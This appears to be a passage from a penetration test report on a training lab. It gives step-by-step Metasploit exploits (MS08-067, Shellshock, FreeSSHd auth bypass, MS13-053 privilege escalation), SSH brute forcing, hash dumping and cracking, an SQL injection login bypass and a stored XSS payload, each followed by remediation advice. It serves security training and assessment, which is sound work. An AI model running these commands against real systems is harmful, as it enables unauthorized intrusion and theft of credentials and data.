172.19.19.3 21, 53,80,88,135,139,389,445, ftp, dns (ms dns 6.0.6001), http(ms iis httpd 7.0), kerberos(port
464,593,636,3268,3389,5357,57 88), msrpc, netbios-ssn, ldap, smb, kpassword5, http-rpc-epmap
22 (ncacn_http), rdp (ms-wbt-server), wsdapi
49152,49153,49154,49155,4915
7,
49158,49161,49165,49170
172.19.19.4 21,80,135,139,445,5357, ftp,http,msrpc,netbios-ssn, ms httpapi httpd 2.0
49152,49153,49154,49155,
49156,49157
172.19.19.5 21,80 ftp, http
172.19.19.6 21, 80,135,139,445,3306,49152, ftp, apache httpd 2.4.2, msrpc, netbios-ssn, mysql
49153,49154,49155,49156,
49157, 49158
172.19.19.7 21,80,135,139,445,5357,49152, ftp, ms iis httpd 7.0, msrpc, netbios-ssn , smb, ms httpapi
49153,49154,49155,49156, httpd 2.0
49157
172.19.19.8 21,135,139,445,3389 ftp, msrpc, netbios-ssn, Microsoft-ds smb, ms-wbt-server (rdp)
172.19.19.9 21, 80,135,139,445,3306,49152, ftp, apache httpd 2.4.2, msrpc, netbios-ssn, mysql,
49153,49154,49155,49156,4915 msrpc services
7,
49158
172.19.19.10 21, 80,135,139,445,49152, ftp, ms iis httpd 7.5, netbios-ssn, msrpc services, ms-wbt-server
49153,49154,49155,49156,4915 (rdp)
7
GNAT 21,135,139,445,1025,3389 ftp, msrpc, netbios-ssn, Microsoft-ds (smb), ms-wbt-server
ROUTER (rdp)
(192.168.0.1,
172.19.19.1,
172.17.0.1,
10.10.0.1)
Table 6: Open ports and services on hosts
Recommendations:
1. Close the unnecessary services on the targeted systems. Enable only the traffic you need to
access internal hosts — preferably as far as possible from the hosts you’re trying to protect

24
— and deny everything else. This goes for standard ports, such as TCP 80 for HTTP and
ICMP for ping requests.
2. Configure firewalls to look for potentially malicious behavior over time and have rules in
place to cut off attacks if a certain threshold is reached, such as 10 port scans in one minute
or 100 consecutive ping (ICMP) requests. Most firewalls and IPSs can detect such scanning
and cut it off in real time.
3. Setup the router with a firewall to prevent attackers from being able to directly attempt to
access your computer. This strategy is called defense in depth and it will help protect you
from attacks and prevent the port scans from reaching your computer (as they will instead
be hitting the router's WAN port firewall instead). Also, ensure that the routers and firewalls
cannot be bypassed using source routing techniques.
4. Filter inbound ICMP message types at border routers and firewalls. This forces attackers to
use full-blown TCP port scans against all of your IP addresses to map your network
correctly.
5. Filter all outbound ICMP type 3 “unreachable” messages at border routers and firewalls to
prevent UDP port scanning and firewalking from being effective.
6. Assess the way that your network firewall and IDS devices handle fragmented IP packets by
using fragtest and fragroute when performing scanning and probing exercises. Some devices
crash or fail under conditions in which high volumes of fragmented packets are being
processed.
7. If you house publicly accessible FTP services, ensure that your firewalls aren’t vulnerable to
stateful circumvention attacks relating to malformedPORTandPASVcommands.
8. If commercial firewall is used, ensure that latest service pack is installed and the rule sets are
updated.
9. Be aware of your own network configuration and its publicly accessible ports by launching
TCP and UDP port scans along with ICMP probes against your own IP address space.
10. TCP Wrappers also give the administrator the flexibility to permit or deny access to the
services based upon IP addresses or domain names.
Exploitability:
1. Some of the services in the open ports are exploited successfully to gain access to the
systems and also escalate the privileges.
2. We could gain access to multiple hosts in the network.
[Challenge 2:] Exploit and root “OPERATIONS” machine.

a) Present the hash value of “Employee Insurance
Details.xlsx” b) Find if “Personal” folder has images which
were used to send sensitive information
Category: SMB Exploitation

Vendor Reference: -
PCI Vuln: Yes
Threat Description:

25
This challenge requires us to exploit the “OPERATIONS” machine.
We found that the system is vulnerable to vulnerability in Microsoft Server Message Block (SMB)
Protocol. It is a remote code execution vulnerability which exploits the way that Microsoft Server
Message Block (SMB) Protocol handles NTLM credentials when a user connects to an attacker's SMB
server
Exploitation:
1. Network Scan:
Get the IP Address of “OPERATIONS” machine:
In the challenge 1, we found the IP address of Operations machine by running nbtscan tool
in Kali Linux:
Figure 13: bntscan for 172.19.19.x

The IP address for OPERATIONS machine is 172.19.19.8.
2. Open Ports and Services

Let us find the open ports and services running on this machine using the command:
nmap –p 1-65535 –sV 172.19.19.8
Figure 14: nmap for 172.19.19.8

Port 445 runs is SMB service. Let us find if this service is vulnerable.

26
3. Find SMB vulnerabilities:

nmap --script smb-check-vulns --script-args=unsafe=1 172.19.19.8
Figure 15: SMB vulnerabilities

We found that the host is vulnerable to MS08-067
4. Exploiting MS08-067
Open msfconsole in Kali Linux

27
Figure 16: msfconsole

Search for ms08_067 exploit
Figure 17: search ms08_067 exploit
As the exploit is available in metasploit, use the following commands as shown in figure 18:
 use exploit/windows/smb/ms08_067_netapi
 set RHOST 172.19.19.8
 exploit and press enter

28
Figure 18: MS08-067 Exploit
Figure 19: meterpreter session for OPERATIONS

29
We get the meterpreter session once we press enter
5. Hash value of “Employee Insurance Details.xlsx”

Type “shell” in meterpreter session obtained. The required documents is in “My Documents”
folder as shown in figure 20:
Figure 20: Documents in OPERATIONS machine
Type exit to come out of the shell and go back to meterpreter session to download the required
document to Kali machine

30
Figure 21: download the document
Goto the /root/Desktop/downloads location in Kali Linux to find the hash of the document
Figure 22: Hash value of document

Hence, the hash value of “Employee Insurance Details.xlsx” as shown in figure 22.
6. Challenge b
The b section of the challenge requires us to discover the “Personal” folder with large
images and find if these images contain sensitive data.
As shown in figure 21 above, the “Personal” folder is in “My Documents” folder

31
Figure 23: Personal Folder with large images
- Now we have to view these images using a steganography tool to find if any of these
images contain sensitive information
- We decide to use QuickStego tool which is there in Windows Server 2012 subnet A
machine
- To copy the machines to Windows server 2012 machine, we start apache server in Kali
Linux and host these image files in the server and download them in Windows 2012
machine.
So, first we download the images in Kali Linux in /var/www location as this the location where we
host files in apache server. We create “/var/www/images” and download the images here
Figure 24: Download images in /var/www/images

32
Figure 25: Start apache service

Now login to Windows 2012 subnet A machine. We can download the images from
http://192.168.0.5/images using firefox browser
Figure 26: download images in windows machine

33
Figure 27: Save the files in C:/images

7. Install QuickStego
Figure 28: QuickStego Installation

Once QuickStego is installed, open the images downloaded using the tool to find if any of them
contains sensitive data
Click “Open image” in QiuckStego:

34
Figure 29: QuickStego Open image
Open the images one by one.

We find that “The_Sower.bmp” contains sensitive information about company as shown in figure
30 below:

35
Figure 30: The_Sower.bmp hidden information

Impact:
MS08-067 is a critical vulnerability which leads to system-level access for the OPERATIONS
machine. The vulnerability could allow remote code execution if an affected system received a
specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server
2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary
code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. This
security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP,
Windows Server 2003, and rated Important for all supported editions of Windows Vista and
Windows Server 2008.
This vulnerability allows an attacker to replay the user's credentials back to them and execute code in
the context of the logged-on user. If a user is logged on with administrative user rights, an attacker
who successfully exploited this vulnerability could take complete control of an affected system. An
attacker could then install programs; view, change, or delete data; or create new accounts with full
user rights. Users whose accounts are configured to have fewer user rights on the system could be
less impacted than users who operate with administrative user rights.
To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list,
see CVE-2008-4037.

36
Result Analysis:
The attacker can easily exploit the MS08-067 vulnerability to gain access to the system documents in
the target host.
Recommendations:
1. Microsoft recommends that customers apply the update immediately.
2. Firewall best practices and standard default firewall configurations can help protect network
resources from attacks that originate outside the enterprise perimeter. Best practices
recommend that systems that are connected to the Internet have a minimal number of ports
exposed.
3. On Windows Vista and Windows Server 2008, the vulnerable code path is only accessible to
authenticated users. This vulnerability is not liable to be triggered if the attacker is not
authenticated.
4. Refer to the following for detailed recommendations:
https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
https://support.microsoft.com/en-in/kb/958644
[Challenge 3:] Compromise the ubuntu machine and present the

hash value of “Customer Data.xlsx”
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
In this challenge, we exploit a vulnerability called shellshock to get the information from target ubuntu
machine. This vulnerability potentially affects most versions of the Linux and Unix operating systems,
in addition to Mac OS X (which is based around Unix). Known as the “Bash Bug” or “ShellShock,”
the GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271) could allow an attacker to
gain control over a targeted computer if exploited successfully. The vulnerability affects Bash, a
common component known as a shell that appears in many versions of Linux and Unix. Bash acts as
a command language interpreter.
When a web server uses the Common Gateway Interface (CGI) to handle a document request, it
passes various details of the request to a handler program in the environment variable list. For
example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program
sending the request. If the request handler is a Bash script, or if it executes one for example using the
system call, Bash will receive the environment variables passed by the server and will process them as
described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a
specially crafted server request.
Security documentation for the widely used Apache web server states: "CGI scripts can ... be extremely
dangerous if they are not carefully checked." and other methods of handling web server requests are
often used. There are a number of online services which attempt to test the vulnerability against web
servers exposed to the Internet.

37
Exploitation:
1. Network Scan
Get the IP Address of ubuntu machine
From challenge 1 we know that the IP address of ubuntu machine is 172.19.19.5
Figure 31: 172.19.19.x hosts
Figure 32: unbuntu machine

2. Open Ports and Services
Let us find if any vulnerable service is running on ubuntu machine
From figure 31, we find that port 80 with APACHE 2.2.22 is open for ubuntu.
3. dirb fuzzing
We run dirb to find hidden directories in the unbuntu machine.

38
dirb http://172.19.19.5 -w /usr/share/dirb/wordlists
Figure 33: dirb fuzzing

We found that there is cgi-bin directory
Run the dirb fuzzing again for cgi-bin directory to find hidden files in it
dirb http://172.19.19.5/cgi-bin/ -w /usr/share/dirb/wordlists/big.txt
Figure 34: dirb fuzzing for cgi-bin

39
Let us browse the highlighted path in figure 33
Figure 35: ShellShock hint in cgi-bin url

So we found that machine is vulnerable to shellshock bash vulnerability
4. Exploit ShellShock
Metasploit exploit: exploit/multi/http/apache_mod_cgi_bash_exec
In Kali Linux:
 msfconsole
 use exploit/multi/http/apache_mod_cgi_bash_exec
 set RHOST 172.19.19.5
 set TARGETURI /cgi-bin/cinema
 set payload linux/x86/meterpreter/bind_tcp
 exploit

40
Figure 36: set options for shell shock exploit
Figure 37: meterpreter session for ubuntu machine
5. Hash of “Customer Data.xlsx”

The document is found in location “/home/Jason/Documents” as shown in figure 38
below:

41
Figure 38: Document location

Create a directory /root/Desktop/ubuntu_data in Kali Linux where we will download the required
document: mkdir -p /root/Desktop/ubuntu_data in meterpreter session obtained.
Now download the required document:
Figure 39: Download “Customer Data.xlsx”
Find the hash value of the document:
Figure 40: hash value of “Customer Data.xlsx”

42
Impact:
The NIST has given Shellshock a ‘perfect’ rating of 10.0 out of 10.0 for both Impact and
Exploitability, meaning the bug is both easily exploitable and has the capacity to impact a huge
number of systems.
Even worse than how ubiquitous it is is the fact that Bash is embedded and accessed in so many
various ways that it’s impossible to know all the different use-cases in order to secure them. Not
every vulnerable system is vulnerable to remote exploit, it’s important to note, but the danger is
there for many.
The Bash bugs also allow attackers more power than they had with the OpenSSL bug. A malicious
actor could take complete control of a system, without even the need for user credentials.
Result Analysis:
We could successfully exploit the ubuntu machine using the shell-shock vulnerability and get the
sensitive information from the target host.
Recommendations:
Appropriate patches need to be applied for the vulnerable systems.
As organizations look for best practices on how to update all of their affected systems, they look for
a solution that can do the following:
 Automatically manage patches for multiple operating systems across hundreds or thousands
of endpoints, regardless of location, connection type or status
 Reduce security and compliance risk by slashing remediation cycles from weeks to hours
 Provide visibility into patch compliance with real-time monitoring and reporting
 Patch online and offline virtual machines to improve security in virtual environments
 Provide consistent functionality, even over low-bandwidth or globally distributed networks
[Challenge 4:] Compromise Cent OS machine in the network and

present the hash value of "Terms of Service" document.
Category: Authentication
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
This challenge exploits the weak password used in authentication mechanism using ssh_login
metasploit exploit. Brute-forcing is used to get into the Cent Os machine. ssh_login can be used in
brute-forcing login attempts. It leads to unauthorized disclosure of information on the target machine.
Exploitation:
1. Scanning the Network
From Challenge 1 we know that the IP Address of CentOS machine is 172.17.0.3

43
Figure 41: Scan for 172.17.x.x hosts
Figure 42: Open Ports and Services in 172.17.0.3

44
We found that on port 22, OpenSSH 5.3 (protocol 2) is running.
Let us try to find a metasploit exploit for this service.
1. Exploiting “ssh_login” vulnerability
 search ssh
 use auxiliary/scanner/ssh/ssh_login
 set RHOSTS 172.17.0.3
 set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
 exploit
The root_userpass.txt is used for brute-forcing the username and password.
Figure 43: exploit /auxiliary/scanner/ssh/ssh_login

45
It will bruteforce the username/passwords in the file provided and try to get meterpreter session
Figure 44: Bruteforce using ssh_login : (root:password works)
sessions –l
sessions –i 1 will connect to session 1
It will list the sessions obtained:
Figure 45: Sessions obtained

46
2. Get “Terms of Service.pdf” in the session obtained
The document is in location “/home/Admin/Documents”

Get the md5sum as shown below in figure 45:
Figure 46: Terms Of Service.pdf

Impact:
CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 HIGH
Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification;
Allows disruption of service
Result Analysis:
Weak password led to this exploitation. Strong passwords lead to a stronger authentication
mechanism. Brute-forcing could be done in a few seconds due to password used. We could
successfully get a session to the target machine and read the sensitive document “Terms os
Service.pdf”
Recommendations:
Use Strong passwords for authentication
THINGS TO INCLUDE
1. At least eight characters.
2. One or more of each of the following:

47
o lower-case letter
o upper-case letter
o number
o punctuation mark
3. Lookalike characters to protect against password glimpses. Examples:
o O as in Oscar and the number 0.
o Lower-case l and upper-case I.
o The letter S and the $ sign.
THINGS TO AVOID
1. Words you can find in the dictionary.
2. Passwords shown as "example strong passwords."
3. Personal information, such as names and birth dates.
4. Keyboard patterns, like qwerty or 12345. Particularly avoid sequences of numbers in order.
5. Common acronyms.
6. All one type of character - such as all numbers, all upper-case letters, all lower-case letters,
etc.
7. Repeating characters, such as mmmm3333.
8. The same password you use for another application.
[Challenge 5:] Exploit “ACCOUNTS” machine application a)

Present the hash value of “FNB_Trading_Summary” b) Find the
password of user “Arnold”
Category: Authorization, Authentication

Vendor Reference: -
PCI Vuln: Yes
Threat Description:
Weak authentication mechanism as well as weak passwords can lead to complete compromise of the
systems. We could exploit the vulnerability found in FreeSSHd to bypass authentication, You just
need the username (which defaults to root). And then we used local windows exploit in metasploit to
escalate the privileges to NT AUTHORITY user in Windows 7 machine. The exploit has been tested
with both password and public key authentication.
Exploitation:
1. Network Scanning:

48
From challenge 1, we know that the IP address of ACCOUNTS machine is 172.19.19.2
Figure 47: Network Scan 172.19.19.xx
Open ports and services in 172.19.19.2:
Figure 48: Port scanning for 172.19.19.2
2. Exploiting WeOnlyDo sshd 2.1.3

Search for sshd exploits
Figure 49: Search sshd exploits

 Use exploit/windows/ssh/freesshd_authbypass
 set RHOST 172.19.19.2

49
 set RPORT 45
 exploit
Figure 50: set options for sshd exploit

We got the meterpreter session using this exploit
Figure 51: Meterpreter session
3. Hash value of FNB_Trading_Summary
Let us find the FNB_Trading_Summary document and then find its hash:

50
Figure 52: FNB_Trading_Summary.xls

Now, we find the hash of this document
Create a directory /root/Desktop/accounts in Kali Linux
Download the document:
Figure 53: Download FNB_Trading_Summary.xls

Calculate hash of document:
Figure 54: Hash value for FNB_Trading_Summary.xls

51
4. Get the password of user “Arnold”
When trying to access directories for other users, we get “access denied”
Figure 55: Access denied for john and Jason users

Let us do the privilege escalation and try to find “Arnold” user’s password
Press ctrl+z to background the session obtained.
As the OS version for ACCOUNTS machine is “Windows 7 Ultimate 7601 SP1 (6.1)”, we can try
windows local exploit “ms13_053_schlamperei” in metasploit for privilege escalation:
 Use exploit/windows/local/ ms13_053_schlamperei
 set session 1
 exploit

52
Figure 56: ms13_053 for privilege escalation

We got the escalated session as “NT AUTHORITY\SYSTEM” user as shown in figure 57 below:
Figure 57: Escalated session

5. Get Arnold’s password from the hashdump
Figure 58: Hashdump in 172.19.19.2

53
Copy the hashdump in hashes.txt in Desktop of Kali Linux machine
Figure 59: hashes.txt

6. Crack the password hash using Cain tool.
Copy the hashes.txt file to /var/www/share path and start the apache server in Kali Linux
Figure 60: Host hashes.txt in apache server in Kali Linux
Figure 61: unix_passwords.txt for bruteforcing

Also add the unix_passwords.txt to the /var/www/share location which will be used for
bruteforcing
Now login to Windows Server 2012 Subnet A machine to use Cain tool for password cracking.
Access the hashes.txt and unix_passwords.txt through the url http://192.168.0.5/share

54
Figure 62: Access the hosted files in Windows machine
 Install Cane tool in Windows 2012 Subnet A from module 17

 Load hashes.txt for LM & NTLM in tool
 Load dictionary as unix_passwords.txt
 Start the scan
Figure 63: Password Cracked using Cain

55
The password for Arnold is orange as shown in figure 63.

We are able to successfully login using remote desktop connection with Arnold/orange credentials
in 172.19.19.2 (ACCOUNTS) machine as shown in figures 64 and 65.
Figure 64: Remote Desktop for 172.19.19.2

56
Figure 65: Successful login using Arnold user
Impact:
The freesshd vulnerability leads to authentication bypass. The attacker can gain access to the
machine without using password, and using default username as “root”
The impact further increases by using privilege escalation using local windows exploits in metasploit.
We could remotely connect to the desktop of ACCOUNTS machine successfully as a result of the
vulnerability.
Result Analysis:
WeOnlyDo sshd 2.1.3 (protocol 2.0) is vulnerable to buffer overflow error when handling a specially
crafted key exchange algorithm string received from an SSH client. When exploited, it leads to
complete system compromise.
Recommendations:
- The vulnerable software versions should be patched on regular basis.
- Audit should be conducted regularly to find if machine is non-compliant i.e. with the un-
patched softwares. These should be patched immediately.

57
[Challenge 6:] Perform web application penetration test for

www.fnb.com a) SQL Injection to login without a password b) XSS
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
SQL injection refers to an injection attack wherein an attacker can execute malicious SQL statements
that control a web application’s database server. Since an SQL injection vulnerability could possibly
affect any website or web application that makes use of an SQL-based database, the vulnerability is
one of the oldest, most prevalent and most dangerous of web application vulnerabilities. It occurs
because of the un-validated user input being passed and processed by the web application. By
leveraging SQL injection vulnerability, given the right circumstances, an attacker can use it to bypass
a web application’s authentication and authorization mechanisms and retrieve the contents of an entire
database. SQL injection can also be used to add, modify and delete records in a database, affecting
data integrity. To such an extent, SQL injection can provide an attacker with unauthorized access to
sensitive data including, customer data, personally identifiable information, trade secrets, intellectual
property and other sensitive information.
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute
malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web
application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a
web application makes use of unvalidated or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a
vulnerability within a website or web application that the victim would visit, essentially using the
vulnerable website as a vehicle to deliver a malicious script to the victim’s browser. While XSS can be
taken advantage of within VBScript, ActiveX and Flash (although now considered legacy or even
obsolete), unquestionably, the most widely abused is JavaScript – primarily because JavaScript is
fundamental to most browsing experiences.
Exploitation:
1. SQL Injection for www.fnb.com
- Login to Windows server 2012 subnet A machine
- Open firefox browser
- Open www.fmb.com and press login button
- Provide the username as rrr’ or 1=1 --
- The addition of the or 1=1 -- condition causes the where clause to always evaluate to
true, which leads to successful login

58
Figure 66: www.fnb.com login page
We could successful login as Smith as shown figure 66

59
Figure 67: Logged as smith successfully

60
Figure 68: Smith’s profile
Using parameter tampering in url, we could view profiles of other users as well:

61
Figure 69: John’s profile
2. XSS Attack:
- Go to Blog tab for www.fnb.com

62
Figure 70: Blog tab of www.fnb.com

- Scroll down to the comments section and type the following:
<script>alert(‘XSS’)</script>
We will get the XSS alert as shown in figure 71 below:

63
Figure 71: XSS Alert
- Figure 72 shows how the payload got injected in the page source:
Figure 72: Page Source for XSS injection

64
If we refresh the page, the Stored XSS gets executed again.
Impact:
SQL Injection:
We could successful login as Smith to www.fnb.com using SQL injection and perfrom actions on
user’s behalf. For a hacker, it represents an effective way to compromise data layers even if firewalls
and intrusion detection systems are in place. Once control has been taken over the database, data is
easily accessible and the attacker has an excellent position to attack other systems, clients and users
related to the database.
SQL injection attacks will habitually allow the intruder to view data contained in the database and
modify its content. However, data confidentiality and integrity is not the only concern when
considering this security issue. In fact, the hacker could gain much more privileges over the
database. In some cases, he could even end up acting as a system administrator of the database
server. It is possible to gain a total control over a database server from a simple SQL injection
vulnerability.
The database being a trusted element in most networks, it could be an excellent spot for the hacker
to launch other attacks across the network. As you can imagine, things can quickly degenerate from
there if network security is not solid.
Cross-site scripting:
Some of the most popular attacks carried out using XSS are:
1. Cookie stealing
2. Alert pop-up on page
3. Redirecting to another website/page/phishing site
4. Executing browser exploits
XSS is a very underestimated vulnerability. It is very important for both developers and web
application testers to understand that a lot of damage can be caused using this vulnerability.
Result Analysis:
SQL Injection and XSS attacks occur because user input is processed in a malicious way and it leads
to malicious execution of code.
The most common cause of SQL Injection is when user-input gets appended to the SELECT query
and it is constructed dynamically. SQL injection errors occur when:
1. Data enters a program from an untrusted source.
2. The data used to dynamically construct a SQL query
The main consequences are:
 Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is
a frequent problem with SQL Injection vulnerabilities.
 Authentication: If poor SQL commands are used to check user names and passwords, it
may be possible to connect to a system as another user with no previous knowledge of the
password.

65
 Authorization: If authorization information is held in a SQL database, it may be possible to
change this information through the successful exploitation of a SQL Injection vulnerability.
 Integrity: Just as it may be possible to read sensitive information, it is also possible to make
changes or even delete this information with a SQL Injection attack.
XSS: Cross-Site Scripting (XSS) attacks occur when:
1. Data enters a Web application through an untrusted source, most frequently a web request.
2. The data is included in dynamic content that is sent to a web user without being validated
for malicious content.
The malicious content sent to the web browser often takes the form of a segment of JavaScript, but
may also include HTML, Flash, or any other type of code that the browser may execute. The variety
of attacks based on XSS is almost limitless, but they commonly include transmitting private data, like
cookies or other session information, to the attacker, redirecting the victim to web content
controlled by the attacker, or performing other malicious operations on the user's machine under the
guise of the vulnerable site.
Recommendations:
SQL Injection:
To counter SQL injection attacks, you need to:
 Constrain and sanitize input data. Check for known good data by validating for type,
length, format, and range.
 Use type-safe SQL parameters for data access. You can use these parameters with stored
procedures or dynamically constructed SQL command strings. Parameter collections such
as SqlParameterCollection provide type checking and length validation. If you use a
parameters collection, input is treated as a literal value, and SQL Server does not treat it as
executable code. An additional benefit of using a parameters collection is that you can
enforce type and length checks. Values outside of the range trigger an exception. This is a
good example of defense in depth.
 Use an account that has restricted permissions in the database. Ideally, you should
only grant execute permissions to selected stored procedures in the database and provide no
direct table access.
 Avoid disclosing database error information. In the event of database errors, make sure
you do not disclose detailed error messages to the user.
Note Conventional security measures, such as the use of Secure Socket Layer (SSL) and IP
Security (IPSec), do not protect your application from SQL injection attacks.
XSS (Cross-site scripting):
 The problem affects dynamic page creation based on input that was not validated.
 Omission of a sanity check on input data can have unexpected security implications. The
problem is preventable through good development standards such as input validation.
 You need to evaluate solutions on a per site, page, and even field basis and use a technique
that makes sense.
The following list outlines the general approaches to prevent cross-site scripting attacks:

66
 Encode output based on input parameters.
 Filter input parameters for special characters.
 Filter output based on input parameters for special characters.
While filtering can be an effective technique, there are a few caveats:

 Filtering may not be appropriate for some input. For example, in scenarios where you are
receiving <TEXT> input from an HTML form, you may instead choose a method such as
encoding (see below).
 Some filtered characters may actually be required input to server-side script.
The following sample filter, which is written in JavaScript, demonstrates how to remove special
characters:
function RemoveBad(strTemp) {
strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|$|$|\&|\+|\-/g,"");
return strTemp;
}
Possible sources of malicious data
While the problem applies to any page that uses input to dynamically generate HTML, the following
are some possible sources of malicious data to help you spot check for potential security risks:
 Query String
 Cookies
 Posted data
 URLs and pieces of URLs, such as PATH_INFO
 Data retrieved from users that is persisted in some fashion such as in a database

67
[Challenge 7:] Exploit “HRDEPT” machine and present the hash

value of “Employee Details.xlsx”
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
WordPress plugins can be exploited for remote code execution. In this challenge, we exploit an
arbitrary file upload in the WordPress InBoundio Marketing. It allows to upload arbitrary php files
and get remote code execution.
Exploitation:
1. Network Scanning
Login to Kali Linux and perform network scanning using nbtscan:
Figure 73: HRDEPT’s IP Address : 172.19.19.6

nmap scanning:
nmap -sV --script vuln –p 0-65535 172.19.19.6

68
Figure 74: nmap for 172.19.19.6

We found some vulnerable URLs. Let us visit http://172.19.19.6/ECSA/ and check if we get some
more information:
Figure 75: WordPress vulnerability Hint

2. WPScan: Find the vulnerable plugins
Run the WPScan in Kali Linux:

wpscan --url http://172.19.19.6/ECSA --enumerate p

69
Figure 76: WPScan for http://172.19.19.6/ECSA

As shown in figure 76, 3 plugins are found:
We could exploit using the second plugin as WordPress version 2 is vulnerable to shell upload.
3. Exploiting the WordPress Vulnerability
 Type msfconsole in Kali Linux

 use exploit/windows/webapp/wp_inboundio_marketing_file_upload
 set RHOST 172.19.19.6
 set TARGETURI http://172.19.19.6/ECSA
 exploit

70
Figure 77: wordpress plugin exploit

We are able to get the meterpreter session for HRDEPT machine as shown in figure 78.
Figure 78: Meterpreter session obtained

4. Hash value for “Employee Details.xlsx”
“Employee Details.xlsx” is at location “C:\Users\Administrator\Documents”
Figure 79: Employee Details.xlsx

71
Download the document in Kali Linux:
Figure 80: Download the document
Figure 81: Find the hash value of “Employee Details.xlsx”
Impact:
It allows the upload of arbitrary php files and get remote code execution.
Result Analysis:
We could successfully exploit the vulnerable “inboundio_marketing_file_upload” plugin and get the
access to the remote host. We could get the sensitive information on the remote host.
Recommendations:
1. Remove the vulnerable plugin if not required.
2. If the plugin is required, patch the software to get rid of the vulnerability.
[Challenge 8:] Exploit Active Directory machine and extract

employee data.
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
AD DS provides a distributed database that stores and manages information about network
resources and application-specific data from directory-enabled applications. Administrators can use
AD DS to organize elements of a network, such as users, computers, and other devices, into a
hierarchical containment structure. The hierarchical containment structure includes the
Active Directory forest, domains in the forest, and organizational units (OUs) in each domain. A

72
server that is running AD DS is called a domain controller. We exploited the AD machine by
compromising machines in the network in the same domain (lptlabs.com). We first used a
vulnerable WordPress plugin to compromise ACCOUNTS machine in the same domain as Active
directory machine. Then we accessed the shares on the target machine.
Exploitation:
From challenge we know that ldap and kerberos services are running on 172.19.19.3 machine.
Hence, it is the active directory machine:
Figure 82: Active Directory network scan

The domain name for both Accounts (172.19.19.2) and Active Directory (172.19.19.3) machines
is the same

73
Figure 83: Domain Name for Active Directory machine: lptlabs.com
Figure 84: Domain Name for Accounts machine: lptlabs.com

As both the machines are in the same domain, and we already exploited ACCOUNTS machine in
challenge 5. So, let us go one step forward in ACCOUNTS machine and try to find a network user
which can also login to Active directory machine.
2. Get the password for Jason user
We will get the meterpreter session in ACCOUNTS (172.19.19.2) machine and then escalate the user
to NT AUTHORITY/SYSTEM user as already explained in challenge 5.
In Kali Linux,
 Use exploit/windows/ssh/freesshd_authbypass
 set RHOST 172.19.19.2

74
 set RPORT 45
 exploit
Figure 85: set options for sshd exploit for ACCOUNTS machine
We got the meterpreter session using this exploit
Figure 86: Meterpreter session in ACCOUNTS machine

Let us do the privilege escalation and try to find “Jason” user’s password
Press ctrl+z to background the session obtained.
As the OS version for ACCOUNTS machine is “Windows 7 Ultimate 7601 SP1 (6.1)”, we can try
windows local exploit “ms13_053_schlamperei” in metasploit for privilege escalation:
 Use exploit/windows/local/ ms13_053_schlamperei
 set session 1
 exploit

75
Figure 87: ms13_053 for privilege escalation

We got the escalated session as “NT AUTHORITY\SYSTEM” user as shown in figure 88 below:
Figure 88: Escalated session
Now we have the Administrator access to ACCOUNTS machine.

Let us try to get the cachedump to find Jason’s password.
 Press ctrl+z
 use post/windows/gather/cachedump

76
 set session 2
 run
Figure 89: Cachedump for Jason

Once we got the mscash2 for Jason, we run john tool to get the password:
Save the mscashe for Jason in Jason_hash and run the following command:
john Jason_hash –format=mscha2 –wordlist=/usr/share/wordlist/sqlmap.txt
Figure 90: Jason password is amaz0n

The password is “amaz0n”
3. Compromise Active Directory machine using Jason credentials
Now we got the network user for lptlabs.com.
We tried remote desktop connection using “Jason” user to 172.19.19.2 (Accounts) as well as
172.19.19.3 (Active Directory) but login was not successful.
Open the remote desktop connection to ACCOUNTS machine (172.19.19.2) using arnold/orange
credentials:

77
Figure 91: Remote Desktop connection to ACCOUNTS machine

Now we open shares for Active directory machine by typing \\172.19.19.3 in explorer in
ACCOUNTS machine:
We are able to access 3 shares in Active Directory machine:

78
Figure 92: shares in Active Directory machine

- NETLOGON share is empty
- PUBLIC share has empty directories
- SYSVOL has “lptlabs.com” folder:
Figure 93: Access folders in SYSVOL share

We could access the shares and read files such as Group policy files in the target machine.

79
Figure 94: GPTTmpl.ini in \\172.19.19.3...\SecEdit folder
Impact:
We could access the sensitive files such as group policy files in the target machine which can be used
for further exploits.
Result Analysis:
The machines which share the domain with AD server should be secured. Even if one machine is
compromised, it can lead to compromise of all the machines controlled by Domain controller.
Cache dump allowed us to crack the password for Jason which is a common network user in the
domain.
Recommendations:
1. Patch all the Machines in domain for any security bugs and keep them updated.
2. Strong passwords should be used for users.
3. AD server should be have secure configurations settings
https://technet.microsoft.com/en-us/library/dn535497.aspx

80
[Challenge 9:] Exploit “ENTERTAINMENT” machine a) Present the

contact number for Steve on moviescope site b) Extract tables and
users of xsecurity site c) SQL server DB version.
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
SQL injection refers to an injection attack wherein an attacker can execute malicious SQL
statements that control a web application’s database server. Since an SQL injection vulnerability
could possibly affect any website or web application that makes use of an SQL-based database, the
vulnerability is one of the oldest, most prevalent and most dangerous of web application
vulnerabilities. By leveraging an SQL injection vulnerability, given the right circumstances, an
attacker can use it to bypass a web application’s authentication and authorization mechanisms and
retrieve the contents of an entire database. SQL injection can also be used to add, modify and delete
records in a database, affecting data integrity. To such an extent, SQL injection can provide an
